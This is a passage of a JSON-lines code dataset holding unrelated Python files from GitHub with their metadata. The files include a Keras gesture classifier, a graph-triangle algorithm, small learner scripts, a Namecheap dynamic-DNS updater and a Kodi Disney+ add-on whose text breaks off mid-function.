Algorithms/Linked-List.py","file_name":"Linked-List.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3256340536","text":"import cv2\nimport numpy as np\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom sklearn.model_selection import train_test_split\nimport os\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\n\nnum_classes = 3\ninput_shape = (32, 32, 1)\n# 0 = left, 1 = right\ndef load_data():\n train_data = []\n train_labels = []\n\n for file in os.listdir('hand-gesture-data/left'):\n img = Image.open(f'hand-gesture-data/left/{file}')\n img = img.resize((input_shape[0], input_shape[1]))\n img = np.asarray(img, dtype=np.float32)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n train_data.append(img / 255.0)\n train_labels.append(0)\n\n for file in os.listdir('hand-gesture-data/right'):\n img = Image.open(f'hand-gesture-data/right/{file}')\n img = img.resize((input_shape[0], input_shape[1]))\n img = np.asarray(img, dtype=np.float32)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n train_data.append(img / 255.0)\n train_labels.append(1)\n\n\n train_data = np.expand_dims(train_data, -1)\n train_labels = keras.utils.to_categorical(train_labels, num_classes)\n\n return train_data, train_labels\n\n\ndef main():\n train_x, train_y = load_data()\n batch_size = 128\n epochs = 15\n\n model = keras.Sequential(\n [\n keras.Input(shape=input_shape),\n layers.Dense(128, activation='relu'),\n layers.Dense(64, activation='relu'),\n layers.Flatten(),\n layers.Dropout(0.5),\n layers.Dense(num_classes, activation='softmax')\n ]\n )\n\n model.summary()\n model.compile(\n 'adam',\n loss='categorical_crossentropy',\n metrics=['accuracy']\n )\n\n model.fit(train_x, train_y, batch_size, epochs, validation_split=0.2)\n model.predict(train_x)\n model.save('./model.h5')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"OlavAusland/AI","sub_path":"ML/Playground/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43073645111","text":"#!/usr/bin/python\n# -*- coding: latin-1 -*-\n\nimport os\nfrom ConfigParser import SafeConfigParser\n\nclass Propiedades:\n # variables de clase\n ficheroIni = \"config.ini\"\n bApt = False\n bGit = False\n bDocker = False\n\n def __init__(self):\n self.seccion = \"Config\"\n self.check_config_file()\n\n # Verifica si existe el fichero de configuración y si no existe lo crea\n def check_config_file(self):\n directory = os.getenv(\"HOME\")+'/.config/indicador-proxy'\n if not os.path.exists(directory):\n os.makedirs(directory)\n self.config_file = directory + '/' + self.ficheroIni\n if (not os.path.exists(self.config_file)):\n self.config = SafeConfigParser()\n self.config.read(self.config_file)\n self.config.add_section(self.seccion)\n self.config.set(self.seccion,\"proxy_apt\", \"False\")\n self.config.set(self.seccion,\"proxy_git\", \"False\")\n self.config.set(self.seccion,\"proxy_docker\", \"False\")\n with open(self.config_file, 'wb') as configfile:\n self.config.write(configfile)\n \n def lee(self, clave):\n self.config = SafeConfigParser()\n self.config.read(self.config_file)\n try:\n return self.config.get(self.seccion, clave )\n except:\n pass\n\n def escribe(self, clave, valor):\n self.config.set(self.seccion, clave, str(valor))\n with open(self.config_file, 'wb') as configfile:\n self.config.write(configfile)\n\n \n\n\n \n\n","repo_name":"fjcasti/oidpm","sub_path":"propiedades.py","file_name":"propiedades.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31099653530","text":"# -*- coding: utf-8 -*-\n\n# Can be solved by square of matrix in O(V³) time\n# i.e: edges of two-path size\n# and for each neighbor, check\n# if it has another neighbor\n# that connects to the first vertex\n\n# This solution does a square matrix\n# without actually storing it\n\n# Also, this not necessarily have to\n# be solved with a matrix. I think I could\n# have used an adjacent list and brute-force\n\n# runtime O(V³) (runtime required by the problem)\n# space O(V)\n\n\n# O(3*log3)\ndef canonical_triangle(p1, p2, p3):\n triangle = []\n for p in (p1, p2, p3):\n triangle.append(tuple(sorted(p)))\n return tuple(sorted(triangle))\n\n\ndef find_triangles(matrix, dim):\n triangles = set()\n for row in range(dim):\n for col in range(dim):\n if row == col: # avoid loop in first vertex (edge case)\n continue\n if matrix[row * dim + col] > 0: # first edge\n # row2 = col\n for col2 in range(dim):\n if col == col2 or col2 == row: # avoid loop in second and\n # third vertex (edge case)\n continue\n is_triangle = (\n matrix[col * dim + col2] > 0 # second edge\n and matrix[col2 * dim + row] > 0 # third edge\n )\n if is_triangle:\n triangles.add(canonical_triangle(\n (row, col), (col, col2), (col2, row))) # O(3*log3)\n return triangles\n\n\n# A\n# / | \\\n# / | \\\n# B C D\n# | | |\n# | | |\n# E---F---G\n# | |\n# ---------\n# (E, G) is also an edge\nm1 = [\n 1,1,1,1,0,0,0,\n 1,0,0,0,1,0,0,\n 1,0,0,0,0,1,0,\n 1,0,0,0,0,0,1,\n 0,1,0,0,0,1,1,\n 0,0,1,0,1,0,1,\n 0,0,0,1,1,1,0,\n]\n\nprint(find_triangles(m1, 7))\n# {((4, 5), (4, 6), (5, 6))}\n\n# shared edge, edge case\n# a -- b -- c\n# \\ | /\n# \\ | /\n# \\ | /\n# d\n\nm2 = [\n 0,1,0,1,\n 1,0,1,1,\n 0,1,0,1,\n 1,1,1,0,\n]\n\nprint(find_triangles(m2, 4))\n# {\n# ((0, 1), (0, 3), (1, 3)),\n# ((1, 2), (1, 3), (2, 3))\n# }\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/05_17_01_triangles_in_adj_matrix_graph.py","file_name":"05_17_01_triangles_in_adj_matrix_graph.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70279824487","text":"import random\nimport math\n\ndef veletlen(mettol, meddig, lepes=1):\n\tdarab=math.ceil((meddig-mettol)/lepes)\n\teltolas=mettol\n\tszam=math.floor(random.random()*darab)*lepes+eltolas\n\n\treturn szam\n\nprint(veletlen(10,20))\n\nszamok=[]\nfor i in range(100):\n\tszamok.append(veletlen(10,20))\t\nprint(szamok)\n\nszamok=[]\nb = veletlen(10,21)\nfor _ in range(b):\n\tb2=veletlen(10,21)\n\ttemp=[]\n\tfor _ in range(b2):\n\t\ttemp.append(veletlen(160,201))\n\tszamok.append(temp)\n\nprint(szamok)\n\n#szamok=[[veletlen(160,200) for _ in range(veletlen(10,21))] for _ in range(veletlen(10,21))]\nprint(szamok)\n","repo_name":"RTomi05/Pythonsuli","sub_path":"random_number.py","file_name":"random_number.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9445807198","text":"#!/usr/bin/env python3\n\nimport sys, json\n\nFEATURE_JOIN_STRING = \"+\"\nVALUE_JOIN_STRING = \"�\"\n\nfeatures_to_select = json.loads(\"\".join(sys.argv[1:]))\n\nfeatures = sys.stdin.readline().rstrip(\"\\n\")\nfeatures = list(filter(None, features.split(\"\\t\")))\n\nassert len(features) == len(set(features))\n\nfor feature in features_to_select:\n if isinstance(feature, str):\n feature = [feature]\n for sub_feature in feature:\n assert sub_feature in features, \"%s not in %s\" % (sub_feature, features)\n\nprint(\"\\t\" + \"\\t\".join(feature if isinstance(feature, str) else FEATURE_JOIN_STRING.join(feature) \\\n for feature in features_to_select))\n\nfor sample in sys.stdin:\n sample = sample.rstrip(\"\\n\")\n fields = list(filter(None, sample.split(\"\\t\")))\n label, values = fields[0], fields[1:]\n \n assert len(values) == len(features)\n values = dict(zip(features, values))\n \n sample_features = []\n for feature in features_to_select:\n if isinstance(feature, str):\n feature = [feature]\n sample_features.append(VALUE_JOIN_STRING.join(values[sub_feature] for sub_feature in feature))\n \n print(\"%s\\t%s\" % (label, \"\\t\".join(sample_features)))\n\n","repo_name":"michaelnmmeyer/bayes_fss","sub_path":"scripts/mksubset.py","file_name":"mksubset.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14807294621","text":"import random\n\nplayer = int(input(\"请输入你要出的拳,石头1/剪刀2/布3:\"))\ncomputer = random.randint(1,3)\nprint(\"玩家出的拳为 %d,电脑出的拳为 %d\" % (player,computer))\n\nif ((player == 1 and computer == 2)\n or (player == 2 and computer == 3)\n or (player == 3 and computer == 1)):\n print(\"电脑弱爆了!\")\nelif player == computer:\n print(\"平局,再来\")\nelse:\n print(\"我不服,再来\")\n","repo_name":"jimke0127/my_python","sub_path":"基础/mm_10_剪刀石头布.py","file_name":"mm_10_剪刀石头布.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72124591209","text":"\"\"\"\nContains Updater class' implementation\n\"\"\"\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom os import environ\nfrom pathlib import Path\nfrom time import sleep\nfrom typing import List\nfrom xml.etree import ElementTree as Et\n\nfrom requests import get, Response\n\nfrom namecheap.message import send_message\n\n\nclass Updater:\n \"\"\"\n Contains methods to generate a requests to update namecheap.com's\n DNS records for a list of sites\n \"\"\"\n\n def __init__(self, domains: List[str]) -> None:\n self.domains = domains\n self.logger = None\n self.ip = None\n\n def __str__(self) -> str:\n return f'Updater for: `{ \"` `\".join(self.domains)}`'\n\n @staticmethod\n def _verify_env() -> None:\n \"\"\"\n Verifies that the environmental variables used by this class are set\n :raises AttributeError\n \"\"\"\n for var in ['dyn-password', 'log_dir']:\n if environ.get(var) is None:\n raise AttributeError(f'Environmental variable `{var}` not set')\n\n @staticmethod\n def get_ip() -> str:\n \"\"\"\n Gets this computer's external IP address via api call to ipify.com\n \"\"\"\n resp = get('http://api.ipify.org')\n if resp.status_code == 200:\n return resp.text\n return ''\n\n def _logger_setup(self) -> None:\n \"\"\"\n Initiates logger\n \"\"\"\n self._verify_env() # Raises Attribute error if env vars not set\n log_dir = Path(environ['log_dir'])\n if not log_dir.exists():\n log_dir.mkdir()\n filename = Path.joinpath(log_dir, 'namecheap-updater.log')\n log = logging.getLogger('namecheap_updater')\n log.setLevel(logging.DEBUG)\n fmt = logging.Formatter(\"%(asctime)s [%(filename)s] func: [%(funcName)s] [%(levelname)s] \"\n \"line: [%(lineno)d] %(message)s\")\n file_handler = RotatingFileHandler(filename=filename,\n delay=True,\n backupCount=5,\n maxBytes=2000000)\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(fmt)\n if not log.handlers:\n log.addHandler(file_handler)\n self.logger = log\n\n @staticmethod\n def _send_request(domain: str, ip: str) -> Response:\n \"\"\"\n Returns response to get request sent to the update URL\n :param domain: string of domain for which to request an update\n :param ip: string of new ip address\n \"\"\"\n update_url = f'https://dynamicdns.park-your-domain.com/update?' \\\n f'host=@&domain={domain}&password={environ[\"dyn-password\"]}&ip={ip}'\n return get(update_url)\n\n def run(self) -> None:\n \"\"\"\n Gets IP every 5min, if the IP is different than the original IP, sends request to namecheap's DynDNS systems\n to update DNS records correctly.\n \"\"\"\n self._logger_setup()\n for _ in range(3):\n ip = self.get_ip()\n if ip:\n self.ip = ip\n self.logger.info('IP fetched successfully')\n break\n else:\n self.logger.warning(f'IP fetch attempt unsuccessful, trying again in 2 seconds...')\n sleep(2)\n if not self.ip:\n raise AttributeError('Unable to fetch IP address')\n\n while True:\n old_ip = self.ip\n new_ip = self.get_ip()\n if old_ip != new_ip:\n successes = 0\n failures = []\n for domain in self.domains:\n resp = self._send_request(domain, new_ip)\n success = xml_errors(resp.text)\n if success:\n msg = f'IP address change for {domain} submitted to namecheap, ' \\\n 'change should be effective in 30 minutes.'\n self.logger.info(msg)\n successes += 1\n else:\n msg = f'IP address request failure, response: {resp.text}'\n failures.append(msg)\n self.logger.error(msg)\n if successes == len(self.domains):\n msg = f'IP address change for domains: {\" \".join(self.domains)}\\nsuccessful updated to {new_ip}.'\n send_message('Namecheap DynDNS IP address change successful', msg)\n self.ip = new_ip\n else:\n msg = f'Namecheap DynDNS IP address change failed!\\n' + \"\\n\".join(failures)\n send_message('Namecheap DynDNS IP address change Failure!', msg)\n else:\n self.logger.info('IP address same, sleeping')\n sleep(300)\n\n\ndef xml_errors(xml: str) -> bool:\n \"\"\"\n Parses XML, determines if the xml response contains errors.\n False if there are no errors, True if there are.\n :param xml: string, xml response returned from namecheap dns update request\n \"\"\"\n for child in Et.fromstring(xml):\n if child.tag == 'ErrCount':\n return not child.text == '0'\n","repo_name":"jakkso/namecheap_updater","sub_path":"namecheap/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13836368669","text":"from .config import *\nfrom .Vocabulary import Vocabulary\nfrom torch.nn.utils.rnn import pad_sequence\n\n\nclass CollateFn:\n \"\"\"\n Class to collate sample into batch with the same length (sentence length).\n \"\"\"\n\n def __init__(self):\n \"\"\"\n The class constructor.\n \"\"\"\n self.pad_index = PAD_IDX\n self.vocab = Vocabulary(freq_threshold=1)\n self.text_transform = self.vocab.preprocess()\n\n def __call__(self, batch):\n \"\"\"\n Allow the class to be called as function.\n :return: source, and target as batches.\n \"\"\"\n\n # Split the batch\n src_batch, tgt_batch = [], []\n\n for src_sample, tgt_sample in batch:\n src_batch.append(self.text_transform[SRC_LANGUAGE](src_sample.rstrip(\"\\n\")))\n tgt_batch.append(self.text_transform[TGT_LANGUAGE](tgt_sample.rstrip(\"\\n\")))\n\n src_batch = pad_sequence(src_batch, padding_value=self.pad_index)\n tgt_batch = pad_sequence(tgt_batch, padding_value=self.pad_index)\n\n return src_batch, tgt_batch\n","repo_name":"mhannani/zinvert","sub_path":"src/data/collate_fn.py","file_name":"collate_fn.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17575081418","text":"import sys\nimport random\nimport datetime\n\nimport arrow\nfrom kodi_six import xbmcplugin\n\nfrom slyguy import plugin, gui, userdata, signals, inputstream, settings\nfrom slyguy.log import log\nfrom slyguy.exceptions import PluginError\nfrom slyguy.constants import KODI_VERSION, ROUTE_RESUME_TAG\n\nfrom .api import API\nfrom .constants import *\nfrom .language import _\n\napi = API()\n\n@signals.on(signals.BEFORE_DISPATCH)\ndef before_dispatch():\n api.new_session()\n plugin.logged_in = api.logged_in\n\n@plugin.route('')\ndef index(**kwargs):\n folder = plugin.Folder(cacheToDisc=False)\n\n if not api.logged_in:\n folder.add_item(label=_(_.LOGIN, _bold=True), path=plugin.url_for(login), bookmark=False)\n else:\n folder.add_item(label=_(_.FEATURED, _bold=True), path=plugin.url_for(collection, slug='home', content_class='home', label=_.FEATURED))\n folder.add_item(label=_(_.HUBS, _bold=True), path=plugin.url_for(hubs))\n folder.add_item(label=_(_.MOVIES, _bold=True), path=plugin.url_for(collection, slug='movies', content_class='contentType'))\n folder.add_item(label=_(_.SERIES, _bold=True), path=plugin.url_for(collection, slug='series', content_class='contentType'))\n folder.add_item(label=_(_.ORIGINALS, _bold=True), path=plugin.url_for(collection, slug='originals', content_class='originals'))\n folder.add_item(label=_(_.WATCHLIST, _bold=True), path=plugin.url_for(collection, slug='watchlist', content_class='watchlist'))\n folder.add_item(label=_(_.SEARCH, _bold=True), path=plugin.url_for(search))\n\n if settings.getBool('disney_sync', False):\n folder.add_item(label=_(_.CONTINUE_WATCHING, _bold=True), path=plugin.url_for(sets, set_id=CONTINUE_WATCHING_SET_ID, set_type=CONTINUE_WATCHING_SET_TYPE))\n\n if settings.getBool('bookmarks', True):\n folder.add_item(label=_(_.BOOKMARKS, _bold=True), path=plugin.url_for(plugin.ROUTE_BOOKMARKS), bookmark=False)\n\n if not userdata.get('kid_lockdown', False):\n folder.add_item(label=_.SELECT_PROFILE, path=plugin.url_for(select_profile), art={'thumb': userdata.get('avatar')}, info={'plot': userdata.get('profile')}, _kiosk=False, bookmark=False)\n #folder.add_item(label=_.PROFILE_SETTINGS, path=plugin.url_for(profile_settings), art={'thumb': userdata.get('avatar')}, info={'plot': userdata.get('profile')}, _kiosk=False)\n\n folder.add_item(label=_.LOGOUT, path=plugin.url_for(logout), _kiosk=False, bookmark=False)\n\n folder.add_item(label=_.SETTINGS, path=plugin.url_for(plugin.ROUTE_SETTINGS), _kiosk=False, bookmark=False)\n\n return folder\n\n@plugin.route()\ndef login(**kwargs):\n username = gui.input(_.ASK_USERNAME, default=userdata.get('username', '')).strip()\n if not username:\n return\n\n userdata.set('username', username)\n\n password = gui.input(_.ASK_PASSWORD, hide_input=True).strip()\n if not password:\n return\n\n api.login(username, password)\n _select_profile()\n gui.refresh()\n\n@plugin.route()\ndef hubs(**kwargs):\n folder = plugin.Folder(_.HUBS)\n\n data = api.collection_by_slug('home', 'home')\n thumb = _image(data.get('images', []), 'thumb')\n\n for row in data['containers']:\n _set = row.get('set')\n if _set.get('contentClass') == 'brandSix':\n items = _process_rows(_set.get('items', []), 'brand')\n folder.add_items(items)\n\n return folder\n\n@plugin.route()\ndef edit_profile(key, value, **kwargs):\n profile = api.active_profile()\n\n if key == 'prefer_133':\n profile['attributes']['playbackSettings']['prefer133'] = bool(int(value))\n\n if api.update_profile(profile):\n gui.refresh()\n\n# @plugin.route()\n# def profile_settings(**kwargs):\n# folder = plugin.Folder(_.PROFILE_SETTINGS)\n\n# profile = api.active_profile()\n\n# app_language = profile['attributes']['languagePreferences']['appLanguage']\n# playback_language = profile['attributes']['languagePreferences']['playbackLanguage']\n# subtitle_language = profile['attributes']['languagePreferences']['subtitleLanguage']\n# prefer_133 = profile['attributes']['playbackSettings']['prefer133']\n\n# # folder.add_item(label='App Language: {}'.format(app_language))\n# # folder.add_item(label='Playback Language: {}'.format(playback_language))\n# # folder.add_item(label='Subtitle Language: {}'.format(subtitle_language))\n# folder.add_item(label='Prefer Original Video Format: {}'.format('Yes' if prefer_133 else 'No'), path=plugin.url_for(edit_profile, key='prefer_133', value=int(not prefer_133)))\n\n# return folder\n\n@plugin.route()\ndef select_profile(**kwargs):\n if userdata.get('kid_lockdown', False):\n return\n\n _select_profile()\n gui.refresh()\n\ndef _avatars(ids):\n avatars = {}\n\n data = api.avatar_by_id(ids)\n for row in data['avatars']:\n avatars[row['avatarId']] = row['images'][0]['url']\n\n return avatars\n\ndef _select_profile():\n profiles = api.profiles()\n active = api.active_profile()\n avatars = _avatars([x['attributes']['avatar']['id'] for x in profiles])\n\n options = []\n values = []\n can_delete = []\n default = -1\n\n for index, profile in enumerate(profiles):\n values.append(profile)\n profile['_avatar'] = avatars.get(profile['attributes']['avatar']['id'])\n\n if profile['attributes']['parentalControls']['isPinProtected']:\n label = _(_.PROFILE_WITH_PIN, name=profile['profileName'])\n else:\n label = profile['profileName']\n\n options.append(plugin.Item(label=label, art={'thumb': profile['_avatar']}))\n\n if profile['profileId'] == active.get('profileId'):\n default = index\n\n userdata.set('avatar', profile['_avatar'])\n userdata.set('profile', profile['profileName'])\n userdata.set('profile_id', profile['profileId'])\n\n elif not profile['attributes']['isDefault']:\n can_delete.append(profile)\n\n options.append(plugin.Item(label=_(_.ADD_PROFILE, _bold=True)))\n values.append('_add')\n\n if can_delete:\n options.append(plugin.Item(label=_(_.DELETE_PROFILE, _bold=True)))\n values.append('_delete')\n\n index = gui.select(_.SELECT_PROFILE, options=options, preselect=default, useDetails=True)\n\n if index < 0:\n return\n\n selected = values[index]\n\n if selected == '_delete':\n _delete_profile(can_delete)\n elif selected == '_add':\n _add_profile(taken_names=[x['profileName'] for x in profiles], taken_avatars=[avatars[x] for x in avatars])\n else:\n _set_profile(selected)\n\ndef _set_profile(profile):\n pin = None\n if profile['attributes']['parentalControls']['isPinProtected']:\n pin = gui.input(_.ENTER_PIN, hide_input=True).strip()\n\n api.set_profile(profile, pin=pin)\n\n if settings.getBool('kid_lockdown', False) and profile['attributes']['kidsModeEnabled']:\n userdata.set('kid_lockdown', True)\n\n userdata.set('avatar', profile['_avatar'])\n userdata.set('profile', profile['profileName'])\n userdata.set('profile_id', profile['profileId'])\n gui.notification(_.PROFILE_ACTIVATED, heading=profile['profileName'], icon=profile['_avatar'])\n\ndef _delete_profile(profiles):\n options = []\n for index, profile in enumerate(profiles):\n options.append(plugin.Item(label=profile['profileName'], art={'thumb': profile['_avatar']}))\n\n index = gui.select(_.SELECT_DELETE_PROFILE, options=options, useDetails=True)\n if index < 0:\n return\n\n selected = profiles[index]\n if gui.yes_no(_.DELETE_PROFILE_INFO, heading=_(_.DELTE_PROFILE_HEADER, name=selected['profileName'])) and api.delete_profile(selected).ok:\n gui.notification(_.PROFILE_DELETED, heading=selected['profileName'], icon=selected['_avatar'])\n\ndef _add_profile(taken_names, taken_avatars):\n ## PROFILE AVATAR ##\n options = [plugin.Item(label=_(_.RANDOM_AVATAR, _bold=True)),]\n values = ['_random',]\n avatars = {}\n unused = []\n\n data = api.collection_by_slug('avatars', 'avatars')\n for container in data['containers']:\n if container['set']['contentClass'] == 'hidden':\n continue\n\n category = _get_text(container['set']['texts'], 'title', 'set')\n\n for row in container['set'].get('items', []):\n if row['images'][0]['url'] in taken_avatars:\n label = _(_.AVATAR_USED, label=category)\n else:\n label = category\n unused.append(row['avatarId'])\n\n options.append(plugin.Item(label=label, art={'thumb': row['images'][0]['url']}))\n values.append(row['avatarId'])\n avatars[row['avatarId']] = row['images'][0]['url']\n\n index = gui.select(_.SELECT_AVATAR, options=options, useDetails=True)\n if index < 0:\n return\n\n avatar = values[index]\n if avatar == '_random':\n avatar = random.choice(unused or avatars.keys())\n\n ## PROFLE KIDS ##\n kids = gui.yes_no(_.KIDS_PROFILE_INFO, heading=_.KIDS_PROFILE)\n\n ## PROFILE NAME ##\n name = ''\n while True:\n name = gui.input(_.PROFILE_NAME, default=name).strip()\n if not name:\n return\n\n elif name in taken_names:\n gui.notification(_(_.PROFILE_NAME_TAKEN, name=name))\n\n else:\n break\n\n profile = api.add_profile(name, kids=kids, avatar=avatar)\n profile['_avatar'] = avatars[avatar]\n\n if 'errors' in profile:\n raise PluginError(profile['errors'][0].get('description'))\n\n _set_profile(profile)\n\n@plugin.route()\ndef collection(slug, content_class, label=None, **kwargs):\n data = api.collection_by_slug(slug, content_class)\n\n folder = plugin.Folder(label or _get_text(data['texts'], 'title', 'collection'), fanart=_image(data.get('images', []), 'fanart'))\n thumb = _image(data.get('images', []), 'thumb')\n\n for row in data['containers']:\n _type = row.get('type')\n _set = row.get('set')\n\n if _set.get('refIdType') == 'setId':\n set_id = _set['refId']\n else:\n set_id = _set.get('setId')\n\n if not set_id:\n return None\n\n if slug == 'home' and _set['contentClass'] == 'brandSix':\n continue\n\n # if _set['contentClass'] in ('hero', 'episode', 'WatchlistSet'): # dont think need episode here..\n if _set['contentClass'] in ('hero', 'WatchlistSet'):\n items = _process_rows(_set.get('items', []), _set['contentClass'])\n folder.add_items(items)\n continue\n\n elif _set['contentClass'] == 'BecauseYouSet':\n data = api.set_by_id(set_id, _set['contentClass'], page_size=0)\n if not data['meta']['hits']:\n continue\n\n title = _get_text(data['texts'], 'title', 'set')\n\n else:\n title = _get_text(_set['texts'], 'title', 'set')\n\n folder.add_item(\n label = title,\n art = {'thumb': thumb},\n path = plugin.url_for(sets, set_id=set_id, set_type=_set['contentClass']),\n )\n\n return folder\n\n@plugin.route()\ndef sets(set_id, set_type, page=1, **kwargs):\n page = int(page)\n data = api.set_by_id(set_id, set_type, page=page)\n\n folder = plugin.Folder(_get_text(data['texts'], 'title', 'set'), sort_methods=[xbmcplugin.SORT_METHOD_UNSORTED, xbmcplugin.SORT_METHOD_VIDEO_YEAR, xbmcplugin.SORT_METHOD_LABEL])\n\n items = _process_rows(data.get('items', []), data['contentClass'])\n folder.add_items(items)\n\n if (data['meta']['page_size'] + data['meta']['offset']) < data['meta']['hits']:\n folder.add_item(\n label = _(_.NEXT_PAGE, page=page+1),\n path = plugin.url_for(sets, set_id=set_id, set_type=set_type, page=page+1),\n specialsort = 'bottom',\n )\n\n return folder\n\ndef _process_rows(rows, content_class=None):\n items = []\n continue_watching = {}\n\n if settings.getBool('disney_sync', False):\n continue_watching = api.continue_watching()\n\n for row in rows:\n item = None\n content_type = row.get('type')\n\n if content_type == 'DmcVideo':\n program_type = row.get('programType')\n\n if program_type == 'episode':\n if content_class in ('episode', 'ContinueWatchingSet'):\n item = _parse_video(row)\n else:\n item = _parse_series(row)\n else:\n item = _parse_video(row)\n\n if item.playable and settings.getBool('disney_sync', False):\n item.properties['ResumeTime'] = continue_watching.get(row['contentId'], 0)\n item.properties['TotalTime'] = continue_watching.get(row['contentId'], 0)\n\n elif content_type == 'DmcSeries':\n item = _parse_series(row)\n\n elif content_type == 'StandardCollection':\n item = _parse_collection(row)\n\n if not item:\n continue\n\n if content_class == 'WatchlistSet':\n item.context.insert(0, (_.DELETE_WATCHLIST, 'RunPlugin({})'.format(plugin.url_for(delete_watchlist, content_id=row['contentId']))))\n elif content_type == 'DmcSeries' or (content_type == 'DmcVideo' and program_type != 'episode'):\n item.context.insert(0, (_.ADD_WATCHLIST, 'RunPlugin({})'.format(plugin.url_for(add_watchlist, content_id=row['contentId'], title=item.label, icon=item.art.get('thumb')))))\n\n items.append(item)\n\n return items\n\n@plugin.route()\ndef add_watchlist(content_id, title=None, icon=None, **kwargs):\n gui.notification(_.ADDED_WATCHLIST, heading=title, icon=icon)\n api.add_watchlist(content_id)\n\n@plugin.route()\ndef delete_watchlist(content_id, **kwargs):\n data = api.delete_watchlist(content_id)\n\n if not data.get('watchlistItems'):\n gui.redirect(plugin.url_for(''))\n else:\n gui.refresh()\n\ndef _parse_collection(row):\n return plugin.Item(\n label = _get_text(row['texts'], 'title', 'collection'),\n info = {'plot': _get_text(row['texts'], 'description', 'collection')},\n art = {'thumb': _image(row['images'], 'thumb'), 'fanart': _image(row['images'], 'fanart')},\n path = plugin.url_for(collection, slug=row['collectionGroup']['slugs'][0]['value'], content_class=row['collectionGroup']['contentClass']),\n )\n\ndef _parse_series(row):\n return plugin.Item(\n label = _get_text(row['texts'], 'title', 'series'),\n art = {'thumb': _image(row['images'], 'thumb'), 'fanart': _image(row['images'], 'fanart')},\n info = {\n 'plot': _get_text(row['texts'], 'description', 'series'),\n 'year': row['releases'][0]['releaseYear'],\n 'mediatype': 'tvshow',\n 'genre': row['genres'],\n },\n path = plugin.url_for(series, series_id=row['encodedSeriesId']),\n )\n\ndef _parse_season(row, series):\n title = _(_.SEASON, season=row['seasonSequenceNumber'])\n\n return plugin.Item(\n label = title,\n info = {\n 'plot': _get_text(row['texts'], 'description', 'season'),\n 'year': row['releases'][0]['releaseYear'],\n 'season': row['seasonSequenceNumber'],\n 'mediatype' : 'season',\n },\n art = {'thumb': _image(row['images'] or series['images'], 'thumb')},\n path = plugin.url_for(season, season_id=row['seasonId'], title=title),\n )\n\ndef _get_play_path(content_id, skip_intro=None):\n kwargs = {\n 'content_id': content_id,\n 'profile_id': userdata.get('profile_id', ''),\n }\n\n if settings.getBool('disney_sync', False):\n kwargs['sync'] = 1\n\n if skip_intro != None:\n kwargs['skip_intro'] = skip_intro\n\n return plugin.url_for(play, **kwargs)\n\ndef _parse_video(row):\n item = plugin.Item(\n label = _get_text(row['texts'], 'title', 'program'),\n info = {\n 'plot': _get_text(row['texts'], 'description', 'program'),\n 'duration': row['mediaMetadata']['runtimeMillis']/1000,\n 'year': row['releases'][0]['releaseYear'],\n 'dateadded': row['releases'][0]['releaseDate'] or row['releases'][0]['releaseYear'],\n 'mediatype': 'movie',\n 'genre': row['genres'],\n 'season': row['seasonSequenceNumber'],\n 'episode': row['episodeSequenceNumber'],\n },\n art = {'thumb': _image(row['images'], 'thumb'), 'fanart': _image(row['images'], 'fanart')},\n path = _get_play_path(row['contentId']),\n playable = True,\n )\n\n if _get_milestone(row.get('milestones'), 'intro_end'):\n if settings.getBool('skip_intros', False):\n item.context.append((_.INCLUDE_INTRO, 'PlayMedia({},noresume)'.format(_get_play_path(row['contentId'], skip_intro=0))))\n else:\n item.context.append((_.SKIP_INTRO, 'PlayMedia({},noresume)'.format(_get_play_path(row['contentId'], skip_intro=1))))\n\n if row['programType'] == 'episode':\n item.info.update({\n 'mediatype' : 'episode',\n 'tvshowtitle': _get_text(row['texts'], 'title', 'series'),\n })\n else:\n item.context.append((_.EXTRAS, \"Container.Update({})\".format(plugin.url_for(extras, family_id=row['encodedParentOf'], fanart=_image(row['images'], 'fanart')))))\n item.context.append((_.SUGGESTED, \"Container.Update({})\".format(plugin.url_for(suggested, family_id=row['encodedParentOf']))))\n\n if row['currentAvailability']['appears']:\n available = arrow.get(row['currentAvailability']['appears'])\n if available > arrow.now():\n item.label = _(_.AVAILABLE, label=item.label, date=available.to('local').format(_.AVAILABLE_FORMAT))\n\n return item\n\ndef _image(data, _type='thumb'):\n _types = {\n 'thumb': (('thumbnail','1.78'), ('tile','1.78')),\n 'fanart': (('background','1.78'), ('background_details','1.78'), ('hero_collection','1.78')),\n }\n\n selected = _types[_type]\n\n images = []\n for row in data:\n for index, _type in enumerate(selected):\n if not row['url']:\n continue\n\n if row['purpose'] == _type[0] and str(row['aspectRatio']) == _type[1]:\n images.append([index, row])\n\n if not images:\n return None\n\n chosen = sorted(images, key=lambda x: (x[0], -x[1]['masterWidth']))[0][1]\n\n if _type == 'fanart':\n return chosen['url'] + '/scale?aspectRatio=1.78&format=jpeg'\n else:\n return chosen['url'] + '/scale?width=800&aspectRatio=1.78&format=jpeg'\n\ndef _get_text(texts, field, source):\n _types = ['medium', 'brief', 'full']\n\n candidates = []\n for row in texts:\n if 